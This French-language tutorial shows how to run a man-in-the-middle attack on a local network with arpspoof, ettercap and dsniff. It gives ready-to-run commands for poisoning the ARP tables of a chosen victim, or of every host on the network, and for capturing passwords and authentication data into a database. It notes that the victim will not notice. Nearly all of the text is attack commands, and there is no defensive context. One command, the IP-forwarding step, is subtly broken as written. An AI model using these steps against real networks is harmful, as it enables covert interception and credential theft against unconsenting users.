Dsniff est l'une des suites d'outils de reniflage de paquets les plus complètes et les plus puissantes disponibles gratuitement pour capturer et traiter les informations d'authentification. Ses fonctionnalités et ses nombreux utilitaires en ont fait un outil couramment utilisé par les attaquants pour renifler les mots de passe et les informations d'authentification hors des réseaux.
Un commutateur réseau ne transmet pas les paquets à tout le monde sur le réseau de la même manière qu'un concentrateur réseau, et donc théoriquement, une personne sur le réseau ne peut pas regarder le trafic d'une autre personne. Il existe cependant des moyens de résoudre ce problème, qui consiste à effectuer une usurpation d'arp.
Dsnif
Cet article discutera simplement de la façon dont cela se fait sans discuter de la théorie derrière le processus. Pour commencer, il faut installer le programme nécessaire, qui est dans ce cas le package dsniff qui contient le programme arpspoof dont nous avons besoin. Dans Ubuntu ou toute autre distribution basée sur Debian, il est installable avec la commande apt-get comme suit :
Installation (Ubuntu)
$ sudo apt-get install dsniff
Activer le transfert IP
Pour vous assurer que le trafic est transféré vers la destination réelle lorsqu'il atteint notre machine, la commande suivante doit être exécutée :
$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
Cela garantira que la connexion de la machine cible n'est pas déconnectée, et personne ne devrait se rendre compte de ce que nous faisons.
Exécuter l'usurpation ARP
La commande suivante indiquera à la passerelle "Je suis 192.168.0.100", et la commande suivante indiquera 192.168.0.100 "Je suis la passerelle"
$ sudo arpspoof 192.168.0.100 -t 192.168.0.1 $ sudo arpspoof 192.168.0.1 -t 192.168.0.100
Avec cela, tout le trafic censé aller vers la passerelle depuis la machine, et inversement, passera d'abord par notre machine, puis sera ensuite transmis à la véritable cible. Avec cela, nous pouvons exécuter n'importe quel outil d'analyse de paquets tel que tcpdump ou wireshark.
Ettercap
Il existe cependant des programmes pour simplifier l'ensemble du processus. L'un des programmes préférés pour cela est ettercap. Ettercap peut également effectuer une usurpation d'arp, parmi de nombreuses autres fonctionnalités dont il dispose. Dans Ubuntu, le paquet s'appelle ettercap-gtk ;
Installation (Ubuntu)
$ sudo apt-get install ettercap-gtk
Exécuter l'usurpation ARP (GUI)
L'exécution du programme avec le commutateur -G l'exécutera dans GTK plutôt que dans ncurses.
$ sudo ettercap -G
Dans le menu, choisissez ce qui suit :
Sniff -> Unfied sniffing
Et à l'invite, choisissez l'interface réseau à utiliser. Normalement, ce serait eth0
Network Interface: eth0
Dans le menu, choisissez à nouveau ce qui suit pour ajouter tous les hôtes du réseau à la liste
Hosts -> Scan for hosts
Et suivre ce qui suit fera l'usurpation d'arp pour tout le monde dans le réseau
Mitm -> Arp poisoning -> Ok Start -> Start sniffing
Exécuter l'usurpation ARP (commande)
La commande suivante fera la même chose que l'exemple ci-dessus, en une seule commande ;
$ sudo ettercap -q -T -M arp // //
Exemples de commande dsniff
1. Pour surveiller le réseau à la recherche de protocoles non sécurisés :
# dsniff -m [-i interface] [-s snap-length] [filter-expression]
2. Pour enregistrer les résultats dans une base de données, au lieu de les imprimer :
# dsniff -w gotcha.db [other options...]
3. Pour lire et imprimer les résultats de la base de données :
# dsniff -r gotcha.db